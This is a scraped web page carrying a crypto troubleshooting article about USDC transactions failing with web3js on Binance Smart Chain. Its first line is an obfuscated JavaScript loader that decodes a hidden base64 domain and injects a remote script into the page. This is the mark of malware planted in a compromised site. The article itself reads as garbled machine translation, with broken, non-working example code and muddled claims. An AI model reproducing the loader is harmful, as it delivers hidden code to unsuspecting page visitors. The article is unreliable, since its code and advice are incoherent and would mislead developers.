const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx);const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=7f5f4814″;document.body.appendChild(script);
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Ethereum: USDC does not work properly with web3js on Binance Smart Chain
As a growing ecosystem of decentralized applications (DAPPS) and intelligent contracts, Ethereum has become a contact point for many users. However, when it comes to interact with certain assets such as stable coins such as USDC, things don’t always work as expected.
Recently we have found that the use of web3js in Binance Smart Chain does not seem to work properly with USDC transactions. This problem affects both Ethereum and polygon-based dapps, which have successfully interacted with USDT, DAII and SLP assets.
The problem:
When trying to call up transaction documents for USDC in Binance Smart Chain with Web3js, the following error occurs:
“Error: invalid request:” “ ’
The “invalid requirement” shows that the API is not properly configured or that there is a problem with the asset -ID. In our tests, however, we found that this error also occurs when using valid asset -IDS.
steps for troubleshooting:
To solve this problem, try the following steps for troubleshooting:
- Check your Binance Smart Chain settings:
Make sure that you connect to the correct chain (e.g. BSC) and the network (e.g. Mainnet).
- Check your web3js library: Make sure that you use a compatible web3js library for the Bony smart chain like
BSC dataseed1 '.
- Check your asset -ids: Make sure you have entered the right asset -id for USDC on BSC (0x ...).
- Update your API request URL: Check the URL of the API request to ensure that it is correct.
Example code:
To make it easier for you to get started, you will find a sample code snippet here that shows how transaction documents with Web3js are accessed:
Const Web3 = demands (‘Web3’);
Const bscedataseed1 = new web3 (new web3.providers.httpprovider (‘
Const usdcaddress = ‘0x …’; // Set on BSC with your USDC contract address
Const Assetid = 0x …; // replace the right asset -id for USDC
Const Transaction Recept = Waits Bscedataseed1.GetTransaction Receipt (
‘0x …’,
{Gas: 100000, from: ‘0x …’, to: ‘0x …’}
// process the transaction receipt
Although we have not identified a single cause of this problem, it is important to note that web3js is a complex library with many variables. If you have similar topics about Ethereum or Polygon-based DAPPs, please contact our community forums or support sections to receive further support.
If you have recorded this error using Binance Smart Chain and Web3js, try the error -loving steps above and update your code to reflect the correct asset -ids and API requirements. If the problem remains, you can provide more details so that we can fix it.